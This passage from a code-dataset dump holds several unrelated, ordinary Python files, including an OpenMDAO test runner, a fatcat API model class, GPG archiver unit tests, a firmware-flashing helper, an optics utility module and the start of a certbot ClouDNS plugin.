/foo/bar/mypackage/mypackage/mysubpackage/mymod.py:MyTestCase.test_foo\n\"\"\"\n\nimport os\nimport sys\nimport importlib\nfrom openmdao.utils.file_utils import get_module_path\n\n\ndef run_test():\n \"\"\"\n Run individual test(s).\n \"\"\"\n if len(sys.argv) > 1:\n testspec = sys.argv[1]\n parts = testspec.split(':')\n\n if len(sys.argv) != 2 or len(parts) != 2:\n print('Usage: run_test my_mod_path:my_test_case.test_func_name\\n'\n ' OR\\n'\n ' run_test my_mod_path:test_func_name')\n sys.exit(-1)\n\n modpath, funcpath = parts\n if modpath.endswith('.py'):\n modpath = get_module_path(modpath)\n if modpath is None:\n modpath = parts[0]\n moddir = os.path.dirname(modpath)\n sys.path = [moddir] + sys.path\n modpath = os.path.basename(modpath)[:-3]\n\n mod = importlib.import_module(modpath)\n\n parts = funcpath.split('.', 1)\n if len(parts) == 2:\n tcase_name, method_name = parts\n testcase = getattr(mod, tcase_name)(methodName=method_name)\n setup = getattr(testcase, 'setUp', None)\n if setup is not None:\n setup()\n getattr(testcase, method_name)()\n teardown = getattr(testcase, 'tearDown', None)\n if teardown:\n teardown()\n else:\n funcname = parts[0]\n getattr(mod, funcname)()\n\n\nif __name__ == '__main__':\n run_test()\n","repo_name":"OpenMDAO/OpenMDAO","sub_path":"openmdao/devtools/run_test.py","file_name":"run_test.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":451,"dataset":"github-code","pt":"53"} +{"seq_id":"22107134238","text":"# coding: utf-8\n\n\"\"\"\n fatcat\n\n Fatcat is a scalable, versioned, API-oriented catalog of bibliographic entities and file metadata. 
# noqa: E501\n\n The version of the OpenAPI document: 0.3.1\n Contact: webservices@archive.org\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass ReleaseRef(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'index': 'int',\n 'target_release_id': 'str',\n 'extra': 'dict(str, object)',\n 'key': 'str',\n 'year': 'int',\n 'container_name': 'str',\n 'title': 'str',\n 'locator': 'str'\n }\n\n attribute_map = {\n 'index': 'index',\n 'target_release_id': 'target_release_id',\n 'extra': 'extra',\n 'key': 'key',\n 'year': 'year',\n 'container_name': 'container_name',\n 'title': 'title',\n 'locator': 'locator'\n }\n\n def __init__(self, index=None, target_release_id=None, extra=None, key=None, year=None, container_name=None, title=None, locator=None): # noqa: E501\n \"\"\"ReleaseRef - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._index = None\n self._target_release_id = None\n self._extra = None\n self._key = None\n self._year = None\n self._container_name = None\n self._title = None\n self._locator = None\n self.discriminator = None\n\n if index is not None:\n self.index = index\n if target_release_id is not None:\n self.target_release_id = target_release_id\n if extra is not None:\n self.extra = extra\n if key is not None:\n self.key = key\n if year is not None:\n self.year = year\n if container_name is not None:\n self.container_name = container_name\n if title is not None:\n self.title = title\n if locator is not None:\n self.locator = locator\n\n @property\n def index(self):\n \"\"\"Gets the index of this ReleaseRef. # noqa: E501\n\n Zero-indexed sequence number of this reference in the list of references. Assigned automatically and used internally; don't confuse with `key`. # noqa: E501\n\n :return: The index of this ReleaseRef. # noqa: E501\n :rtype: int\n \"\"\"\n return self._index\n\n @index.setter\n def index(self, index):\n \"\"\"Sets the index of this ReleaseRef.\n\n Zero-indexed sequence number of this reference in the list of references. Assigned automatically and used internally; don't confuse with `key`. # noqa: E501\n\n :param index: The index of this ReleaseRef. # noqa: E501\n :type: int\n \"\"\"\n\n self._index = index\n\n @property\n def target_release_id(self):\n \"\"\"Gets the target_release_id of this ReleaseRef. # noqa: E501\n\n Optional, fatcat identifier of release entity that this reference is citing. # noqa: E501\n\n :return: The target_release_id of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._target_release_id\n\n @target_release_id.setter\n def target_release_id(self, target_release_id):\n \"\"\"Sets the target_release_id of this ReleaseRef.\n\n Optional, fatcat identifier of release entity that this reference is citing. # noqa: E501\n\n :param target_release_id: The target_release_id of this ReleaseRef. 
# noqa: E501\n :type: str\n \"\"\"\n if target_release_id is not None and len(target_release_id) > 26:\n raise ValueError(\"Invalid value for `target_release_id`, length must be less than or equal to `26`\") # noqa: E501\n if target_release_id is not None and len(target_release_id) < 26:\n raise ValueError(\"Invalid value for `target_release_id`, length must be greater than or equal to `26`\") # noqa: E501\n if target_release_id is not None and not re.search(r'[a-zA-Z2-7]{26}', target_release_id): # noqa: E501\n raise ValueError(r\"Invalid value for `target_release_id`, must be a follow pattern or equal to `/[a-zA-Z2-7]{26}/`\") # noqa: E501\n\n self._target_release_id = target_release_id\n\n @property\n def extra(self):\n \"\"\"Gets the extra of this ReleaseRef. # noqa: E501\n\n Additional free-form JSON metadata about this citation. Generally follows Citation Style Language (CSL) JSON schema. See guide for details. # noqa: E501\n\n :return: The extra of this ReleaseRef. # noqa: E501\n :rtype: dict(str, object)\n \"\"\"\n return self._extra\n\n @extra.setter\n def extra(self, extra):\n \"\"\"Sets the extra of this ReleaseRef.\n\n Additional free-form JSON metadata about this citation. Generally follows Citation Style Language (CSL) JSON schema. See guide for details. # noqa: E501\n\n :param extra: The extra of this ReleaseRef. # noqa: E501\n :type: dict(str, object)\n \"\"\"\n\n self._extra = extra\n\n @property\n def key(self):\n \"\"\"Gets the key of this ReleaseRef. # noqa: E501\n\n Short string used to indicate this reference from within the release text; or numbering of references as typeset in the release itself. Optional; don't confuse with `index` field. # noqa: E501\n\n :return: The key of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._key\n\n @key.setter\n def key(self, key):\n \"\"\"Sets the key of this ReleaseRef.\n\n Short string used to indicate this reference from within the release text; or numbering of references as typeset in the release itself. Optional; don't confuse with `index` field. # noqa: E501\n\n :param key: The key of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._key = key\n\n @property\n def year(self):\n \"\"\"Gets the year of this ReleaseRef. # noqa: E501\n\n Year that the cited work was published in. # noqa: E501\n\n :return: The year of this ReleaseRef. # noqa: E501\n :rtype: int\n \"\"\"\n return self._year\n\n @year.setter\n def year(self, year):\n \"\"\"Sets the year of this ReleaseRef.\n\n Year that the cited work was published in. # noqa: E501\n\n :param year: The year of this ReleaseRef. # noqa: E501\n :type: int\n \"\"\"\n\n self._year = year\n\n @property\n def container_name(self):\n \"\"\"Gets the container_name of this ReleaseRef. # noqa: E501\n\n Name of the container (eg, journal) that the citation work was published as part of. May be an acronym or full name. # noqa: E501\n\n :return: The container_name of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._container_name\n\n @container_name.setter\n def container_name(self, container_name):\n \"\"\"Sets the container_name of this ReleaseRef.\n\n Name of the container (eg, journal) that the citation work was published as part of. May be an acronym or full name. # noqa: E501\n\n :param container_name: The container_name of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._container_name = container_name\n\n @property\n def title(self):\n \"\"\"Gets the title of this ReleaseRef. # noqa: E501\n\n Name of the work being cited. 
# noqa: E501\n\n :return: The title of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._title\n\n @title.setter\n def title(self, title):\n \"\"\"Sets the title of this ReleaseRef.\n\n Name of the work being cited. # noqa: E501\n\n :param title: The title of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._title = title\n\n @property\n def locator(self):\n \"\"\"Gets the locator of this ReleaseRef. # noqa: E501\n\n Page number or other indicator of the specific subset of a work being cited. Not to be confused with the first page (or page range) of an entire paper or chapter being cited. # noqa: E501\n\n :return: The locator of this ReleaseRef. # noqa: E501\n :rtype: str\n \"\"\"\n return self._locator\n\n @locator.setter\n def locator(self, locator):\n \"\"\"Sets the locator of this ReleaseRef.\n\n Page number or other indicator of the specific subset of a work being cited. Not to be confused with the first page (or page range) of an entire paper or chapter being cited. # noqa: E501\n\n :param locator: The locator of this ReleaseRef. # noqa: E501\n :type: str\n \"\"\"\n\n self._locator = locator\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ReleaseRef):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","repo_name":"internetarchive/fatcat","sub_path":"python_openapi_client/fatcat_openapi_client/models/release_ref.py","file_name":"release_ref.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"53"} +{"seq_id":"30574595082","text":"\"\"\"\nCreated on Sat Jul 26 20:49:41 2018\n\n@author: Ivan A. 
Maidana\n\"\"\"\n\nimport random\nimport numpy as np\n\nFIGURITAS_PARA_COMPLETAR_EL_ALBUM = 6\nVECES_QUE_SE_COMPLETARON_LOS_ALBUNES = 10\nALBUM_LLENO = np.arange (1, FIGURITAS_PARA_COMPLETAR_EL_ALBUM + 1)\nREGISTRO_DE_LAS_REPETICIONES = []\n\nfor repetir in range (VECES_QUE_SE_COMPLETARON_LOS_ALBUNES):\n def JUGADA (ALBUM):\n COUNT = 0\n while all (ALBUM) != all (ALBUM_LLENO):\n DADO = random.randint (1, FIGURITAS_PARA_COMPLETAR_EL_ALBUM)\n COUNT = COUNT + 1\n if ALBUM [DADO -1] == 0:\n ALBUM [DADO -1] = DADO\n return COUNT\n \n ALBUM_POR_LLENAR = [0] * FIGURITAS_PARA_COMPLETAR_EL_ALBUM\n ALBUM = JUGADA (ALBUM_POR_LLENAR)\n REGISTRO_DE_LAS_REPETICIONES.append (ALBUM)\n\t\nPROMEDIO = np.mean (REGISTRO_DE_LAS_REPETICIONES, dtype = int)\n\ndef CANTIDAD (promedio_obtenido, CANTIDAD_QUE_TIENE_UN_PAQUETE):\n PAQUETES_A_COMPRAR = promedio_obtenido / CANTIDAD_QUE_TIENE_UN_PAQUETE\n return PAQUETES_A_COMPRAR\nPAQUETES_1 = CANTIDAD (PROMEDIO, 5)\nPAQUETES_2 = int (PAQUETES_1)\n\ndef COSTO (PAQUETES_A_COMPRAR, PRECIO_UNIDAD_PAQUETES):\n PESOS_ARG = PAQUETES_A_COMPRAR * PRECIO_UNIDAD_PAQUETES\n return PESOS_ARG\nCOSTO_1 = COSTO (PAQUETES_2, 14)\nCOSTO_2 = int (COSTO_1)\n","repo_name":"Ivan9912/mis-archivos-de-python","sub_path":"Exactas Programa/Programas .py/Ejercicio Album/Promedio album [Sin Editado].py","file_name":"Promedio album [Sin Editado].py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33514124963","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\n'''\nCreated on Dec 19, 2013\n\n@author: ejen\n'''\nimport io\nimport unittest\nimport os\nfrom edcore.utils.data_archiver import (import_recipient_keys, archive_files, encrypted_archive_files,\n GPGPublicKeyException, GPGException)\nimport tempfile\nfrom edcore.utils.utils import tar_files\n\n\nclass MockKeyserver():\n\n def __init__(self, keyid, key):\n self.ring = {keyid: key}\n\n def get_key(self, key_id):\n try:\n return self.ring[key_id]\n except Exception:\n return None\n\n def search_key(self, key):\n owners = self.ring.keys()\n if key in owners:\n return [{'keyid': key}]\n else:\n return []\n\n\nclass MockGnuPG():\n\n def __init__(self):\n self.ring = {}\n\n def search_keys(self, recipients, keyserver):\n return keyserver.search_key(recipients)\n\n def list_keys(self):\n return self.ring.values()\n\n def recv_keys(self, keyserver, recipients):\n key = keyserver.get_key(recipients)\n if key is not None:\n self.ring[recipients] = key\n\n\nclass Test_FileUtils(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_import_recipient_keys(self):\n settings = {\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n gpg = MockGnuPG()\n keyserver = MockKeyserver('sbac_data_provider@sbac.com', 'fake key')\n recipients = 
settings['extract.gpg.public_key.cat']\n import_recipient_keys(gpg, recipients, keyserver)\n self.assertEqual(len(gpg.list_keys()), 1)\n\n def test_archive_files(self):\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n\n archive_memory_file = io.BytesIO()\n archive_files(dir, archive_memory_file)\n fixture_len = 343\n self.assertEqual(len(archive_memory_file.getvalue()), fixture_len)\n\n def test_tar_files(self):\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir, tempfile.TemporaryDirectory() as output_dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n output = os.path.join(output_dir, \"test.tar\")\n tar_files(dir, output)\n self.assertNotEqual(os.path.getsize(output), 0)\n\n def test_encrypted_archive_files_public_key_exception(self):\n here = os.path.abspath(os.path.dirname(__file__))\n gpg_home = os.path.abspath(os.path.join(here, \"..\", \"..\", \"..\", \"..\", \"config\", \"gpg\"))\n settings = {\n 'extract.gpg.keyserver': 'hello',\n 'extract.gpg.homedir': gpg_home,\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n recipients = settings['extract.gpg.public_key.cat']\n outputfile = os.path.join(dir, 'test_ouput.gpg')\n homedir = os.path.abspath(settings['extract.gpg.homedir'])\n self.assertTrue(os.path.exists(homedir))\n keyserver = settings['extract.gpg.keyserver']\n self.assertRaises(GPGPublicKeyException, encrypted_archive_files, dir, recipients, outputfile, homedir=homedir, keyserver=keyserver, gpgbinary='gpg')\n\n def test_encrypted_archive_files_unrecoverable_exception(self):\n here = os.path.abspath(os.path.dirname(__file__))\n gpg_home = os.path.abspath(os.path.join(here, \"..\", \"..\", \"..\", \"..\", \"config\", \"gpg\"))\n settings = {\n 'extract.gpg.keyserver': 'hello',\n 'extract.gpg.homedir': gpg_home,\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n recipients = settings['extract.gpg.public_key.cat']\n outputfile = os.path.join(dir, 'test_ouput.gpg')\n homedir = os.path.abspath(settings['extract.gpg.homedir'])\n self.assertTrue(os.path.exists(homedir))\n keyserver = settings['extract.gpg.keyserver']\n self.assertRaises(GPGException, encrypted_archive_files, dir, recipients, outputfile, homedir=homedir, keyserver=keyserver, gpgbinary='gpg111')\n\n def test_encrypted_archive_files(self):\n here = os.path.abspath(os.path.dirname(__file__))\n gpg_home = os.path.abspath(os.path.join(here, \"..\", \"..\", \"..\", \"..\", \"config\", \"gpg\"))\n settings = {\n 'extract.gpg.keyserver': None,\n 'extract.gpg.homedir': gpg_home,\n 'extract.gpg.public_key.cat': 'sbac_data_provider@sbac.com'\n }\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n recipients = settings['extract.gpg.public_key.cat']\n outputfile = os.path.join(dir, 'test_ouput.gpg')\n homedir = os.path.abspath(settings['extract.gpg.homedir'])\n 
self.assertTrue(os.path.exists(homedir))\n keyserver = settings['extract.gpg.keyserver']\n encrypted_archive_files(dir, recipients, outputfile, homedir=homedir, keyserver=keyserver, gpgbinary='gpg')\n self.assertTrue(os.path.isfile(outputfile))\n self.assertNotEqual(os.stat(outputfile).st_size, 0)\n\n def test_archive_unencrypted_files(self):\n files = ['test_0.csv', 'test_1.csv', 'test.json']\n with tempfile.TemporaryDirectory() as dir:\n for file in files:\n with open(os.path.join(dir, file), 'a') as f:\n f.write(file)\n outputfile = os.path.join(dir, 'test_output.zip')\n archive_files(dir, outputfile)\n self.assertTrue(os.path.isfile(outputfile))\n self.assertNotEqual(os.stat(outputfile).st_size, 0)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edcore/edcore/tests/utils/test_data_archiver.py","file_name":"test_data_archiver.py","file_ext":"py","file_size_in_byte":7236,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"42103321861","text":"import asyncio\nimport os, sys\nimport subprocess\nimport tempfile\nfrom pathlib import Path\n\nclass download_fw_intf():\n async def download(self, deviceName, firmwareName=None, flashAddr=None):\n dut = self.configDut[deviceName]\n if 'download' not in dut:\n raise AssertionError('Download method is not configured for {}'.format(deviceName))\n\n for d in dut['download']:\n if len(d) <= 1:\n print('download tool {} is not supported yet'.format(d['tool'] if 'tool' in d else d))\n continue\n\n if d['tool'].upper() == 'MDK':\n if os.name != 'nt':\n print('MDK is only supported on Windows')\n continue\n cmd = [d['path'], '-f', str(Path(d['workdir']) / d['project']), '-t', d['target']]\n p = await asyncio.create_subprocess_exec(cmd[0], *(cmd[1:]), stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await p.communicate()\n if p.returncode:\n print(f'MDK programmer return code: {p.returncode}')\n print('stdout: ' + stdout.decode())\n print('stderr: ' + stderr.decode())\n continue\n break\n\n if d['tool'].upper() == 'JLINK':\n if not firmwareName:\n firmwareName = d['datafile']\n if not flashAddr:\n flashAddr = d['flash_addr']\n if not isinstance(d['flash_addr'], str):\n flashAddr = '{:x}'.format(d['flash_addr'])\n if flashAddr.startswith('0x'):\n flashAddr = flashAddr[2:]\n\n firmwarePath = Path(\"resources\") / 'test_data' / firmwareName\n if not firmwarePath.exists():\n raise AssertionError(f'Firmware {firmwarePath} not found')\n with tempfile.TemporaryDirectory() as tempDir:\n script = Path(tempDir) / 'download_script.jlink'\n script_contents = (\"r\\n\"\n \"exec EnableEraseAllFlashBanks\\n\"\n \"erase\\n\"\n \"loadbin {} {} SWDSelect\\n\"\n \"verifybin {} {}\\n\"\n \"r\\n\"\n \"g\\n\"\n \"qc\\n\".format(firmwarePath, flashAddr, firmwarePath, flashAddr))\n with open(script, 'w') as f:\n f.write(script_contents)\n cmd = [d['path'], '-device', d['device'], '-if', d['interface'], '-speed', str(d['speed']), '-autoconnect', '1', '-JTAGConf', '-1,-1', '-CommanderScript', str(script)]\n p = await asyncio.create_subprocess_exec(cmd[0], *(cmd[1:]), stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n stdout, stderr = await p.communicate()\n if p.returncode:\n print(f'JLINK programmer return code: {p.returncode}')\n print('stdout: ' + stdout.decode())\n print('stderr: ' + stderr.decode())\n continue\n break\n if d['tool'].upper() == 'DAPLINK':\n if not firmwareName:\n firmwareName = d['datafile']\n if 
not os.path.isabs(firmwareName):\n                    firmwarePath = Path(\"resources\") / 'test_data' / firmwareName\n                else:\n                    # use the provided absolute path as-is (firmwarePath was otherwise undefined here)\n                    firmwarePath = Path(firmwareName)\n                cmd = ['pyocd.exe', 'flash', str(firmwarePath), '--probe', '0', '--target', d['target']]\n                p = await asyncio.create_subprocess_exec(cmd[0], *(cmd[1:]), stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE)\n                stdout, stderr = await p.communicate()\n                if p.returncode:\n                    print(f'DAPLINK programmer return code: {p.returncode}')\n                    print('stdout: ' + stdout.decode())\n                    print('stderr: ' + stderr.decode())\n                    continue\n                break\n            print('Firmware downloading failed by {}, try next tool...'.format(d['tool'].upper()))\n        else:\n            raise AssertionError('Failed to download the firmware for {}'.format(deviceName))\n","repo_name":"pansila/Auto-Test-System","sub_path":"sample-scripts/robotest_utilities/src/robotest_utilities/download_fw.py","file_name":"download_fw.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"42450829412","text":"import psycopg2\nimport xml.etree.ElementTree as ET\n\nconn = psycopg2.connect(\"dbname=tracks user=postgres password=mayalove\")\ncur = conn.cursor()\n\ncur.execute('''\nDROP TABLE IF EXISTS Artist;\nDROP TABLE IF EXISTS Album;\nDROP TABLE IF EXISTS Track;\n\nCREATE TABLE Artist (\n    id SERIAL NOT NULL PRIMARY KEY UNIQUE,\n    name TEXT UNIQUE\n);\n\nCREATE TABLE Album (\n    id SERIAL NOT NULL PRIMARY KEY UNIQUE,\n    artist_id INT,\n    title TEXT UNIQUE\n);\n\nCREATE TABLE Track (\n    id SERIAL NOT NULL PRIMARY KEY UNIQUE,\n    title TEXT,\n    album_id INT,\n    len INT,\n    rating INT,\n    count INT\n)\n''')\n\nfilename = input('Input file path: ')\nif len(filename) < 1: filename = 'C:\projects\py_learning\Library.xml'\n\ndef lookup(d, key):\n    found = False\n    for child in d:\n        if found : return child.text\n        if child.tag == 'key' and child.text == key :\n            found = True\n    return None\n\nstuff = ET.parse(filename)\nall = stuff.findall('dict/dict/dict')\nprint('Dict count:', len(all))\n\nfor entry in all:\n    if (lookup(entry, 'Track ID') is None): continue\n\n    name = lookup(entry, 'Name')\n    artist = lookup(entry, 'Artist')\n    album = lookup(entry, 'Album')\n    count = lookup(entry, 'Play Count')\n    rating = lookup(entry, 'Rating')\n    length = lookup(entry, 'Total Time')\n\n    if name is None or artist is None or album is None :\n        continue\n\n    #print(name,artist,album,count,rating,length)\n\n    cur.execute('INSERT INTO Artist (name) VALUES (%s) ON CONFLICT (name) DO NOTHING', (artist,))\n    cur.execute('SELECT id FROM Artist WHERE name=%s', (artist,))\n    artist_id = cur.fetchone()[0]\n\n    cur.execute('INSERT INTO Album (title,artist_id) VALUES (%s,%s) ON CONFLICT (title) DO NOTHING', (album,artist_id))\n    cur.execute('SELECT id FROM Album WHERE title=%s', (album,))\n    album_id = cur.fetchone()[0]\n\n    cur.execute('INSERT INTO Track (title,album_id,len,rating,count) VALUES (%s,%s,%s,%s,%s)', (name, album_id, length, rating, count))\n\n    conn.commit()","repo_name":"vsamusenko/l33tcode_attempts","sub_path":"tracks_db.py","file_name":"tracks_db.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19402565194","text":"'''\nsingle crystal Bragg reflection\n'''\n\nfrom ocelot.optics.elements import *\n# from ocelot.optics.wave import TransferFunction\nfrom ocelot.optics.bragg import *\nfrom ocelot.optics.ray import Ray, trace as trace_ray\nfrom ocelot.gui.optics import *\n\n\nclass Signal(object):\n    def 
__init__(self, n=100):\n self.t = np.linspace(-1,1, n)\n self.f = np.zeros_like(self.t, dtype=np.complex)\n self.n = n\n\nclass Signal3D(object):\n def __init__(self, n=100):\n self.t = np.linspace(-1,1, n)\n self.f = np.zeros_like(self.t, dtype=np.complex)\n self.n = n\n \n def field_on_axis(self):\n return self.fs[0]\n\n def field_sum_abs(self):\n return np.sum(np.abs(self.fs[:])**2)\n \n def free(self):\n pass\n\n\n\ndef read_signal(file_name, E_ref, npad = 10):\n s = Signal()\n data = np.loadtxt(file_name, dtype = complex)\n s.f = data[:,2]\n s.t = np.real(data[:,0])\n \n ''' spectrum with finer resolution '''\n s.nslice = n = len(s.f)\n s.npad = npad\n\n s.f_ = np.zeros((2*npad+1)*n, dtype=complex)\n s.f_[npad*n:(npad+1)*n] = s.f \n s.f = s.f_ \n s.t = (npad+1)*np.linspace(s.t[0], s.t[-1], len(s.f)) \n \n spec = fft.fft(s.f)\n dt = (s.t[1] - s.t[0]) * 1.e-15\n k0 = E_ref / (hbar * c) \n s.freq_k = 2*pi*(fftfreq(len(spec), d=dt) / c )\n s.freq_k = -np.roll(s.freq_k, len(spec)/2) + k0 # take into account s/t\n s.freq_ev = s.freq_k * hbar * c\n s.sp = np.roll(spec, len(spec)/2)\n \n return s\n\n\ndef plot_signal(s): \n plt.plot(s.t, np.abs(s.f))\n\ndef plot_signal_spec(s): \n plt.plot(s.freq_ev, np.abs(s.sp))\n\n\ndef plot_filters(filt, f_test=None, param='tr', ax= None):\n \n if ax == None:\n f = plt.figure()\n ax = f.add_subplot(111)\n \n ax.set_xlabel('Photon Energy [ev]')\n ax2 = ax.twinx()\n plt.grid(True)\n if param == 'tr': \n ax.set_title('Transmissivity')\n data = filt.tr\n if f_test != None: data_test = f_test.tr\n if param == 'ref': \n ax.set_title('Reflectivity')\n data = filt.ref\n if f_test != None: data_test = f_test.ref \n \n l1,=ax.plot(filt.ev, np.abs(data), 'bd')\n #ax2.plot(filt.ev, unfold_angles( np.angle(data)) , 'gd')\n l2,=ax2.plot(filt.ev, np.angle(data) , 'gd')\n \n plt.legend([l1,l2],['abs','phase'])\n \n if f_test != None:\n ax.plot(f_test.ev, np.abs(data_test), 'b--')\n #ax2.plot(f_test.ev, unfold_angles(np.angle(data_test)), 'g--')\n ax2.plot(f_test.ev, np.angle(data_test), 'g--')\n \ndef plot_spec_filt(s, filt, ax):\n \n ax.plot(s.freq_ev, np.abs(s.sp), 'b.')\n tr_r, tr_i = np.real(filt.tr), np.imag(filt.tr)\n tr_mod = np.real(np.sqrt(tr_r*tr_r + tr_i*tr_i)) #modulus of T\n \n ax.plot(filt.ev, tr_mod / np.max(tr_mod) * np.max(np.abs(s.sp)), 'r.--')\n print(s.freq_k)","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/optics/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"41621642284","text":"import os\nimport pandas as pd\nimport powerlaw\n\nRANK_DIR = \"rank\"\nSTATS_DIR = \"stats\"\nFILE_IN = \"rank_ordered.csv\"\n\nfile_path_in = os.path.join(RANK_DIR, FILE_IN)\ndf = pd.read_csv(file_path_in)\nrank_list = df[\"rank\"].to_list()\nresults = powerlaw.Fit(rank_list)\nprint(results.power_law.alpha)\nprint(results.power_law.xmin)\nR, p = results.distribution_compare('power_law', 'lognormal')\nprint(\"R: {}, p: {}\".format(R,p))","repo_name":"netgroup/as-analysis","sub_path":"powerlaw_exp.py","file_name":"powerlaw_exp.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24527120108","text":"import asyncio\n\n\nasync def handle_echo(reader, writer):\n list = {}\n print(reader)\n data = await reader.read(1024)\n message = data.decode()\n lst = message.replace('.', '').split()\n# addr = writer.get_extra_info(\"peername\")\n 
if(lst[0]=='put'):\n if not list:\n list[lst[1]]=[(lst[2], lst[3])]\n else:\n list[lst[1]].append((lst[2], lst[3]))\n print(list)\n writer.close()\n\n\nloop = asyncio.get_event_loop()\ncoro = asyncio.start_server(handle_echo, \"127.0.0.1\", 8181, loop=loop)\nserver = loop.run_until_complete(coro)\ntry:\n loop.run_forever()\nexcept KeyboardInterrupt:\n pass\n\nserver.close()\nloop.run_until_complete(server.wait_closed())\nloop.close()","repo_name":"Ivanlasich/python","sub_path":"PycharmProjects/hello/venv/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"54495406","text":"\"\"\"DNS Authenticator using CLouDNS API.\"\"\"\nimport functools\nimport logging\n\nimport zope.interface\nfrom certbot import errors\nfrom certbot import interfaces\nfrom certbot.plugins import dns_common\n\nfrom certbot_dns_cloudns._internal.client import ClouDNSClient\nfrom certbot_dns_cloudns._internal.resolve import resolve_alias\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_NETWORK_TIMEOUT = 45\n\n\n@zope.interface.implementer(interfaces.IAuthenticator)\n@zope.interface.provider(interfaces.IPluginFactory)\nclass Authenticator(dns_common.DNSAuthenticator):\n \"\"\"DNS Authenticator using CLouDNS API\n This Authenticator uses the ClouDNS API to fulfill a dns-01 challenge.\n \"\"\"\n\n description = ('Obtain certificates using a DNS TXT record '\n '(if you are using ClouDNS for DNS).')\n ttl = 60\n\n def __init__(self, *args, **kwargs):\n super(Authenticator, self).__init__(*args, **kwargs)\n self.credentials = None\n\n @classmethod\n def add_parser_arguments(cls, add):\n super(Authenticator, cls).add_parser_arguments(\n add, default_propagation_seconds=60\n )\n add('credentials', 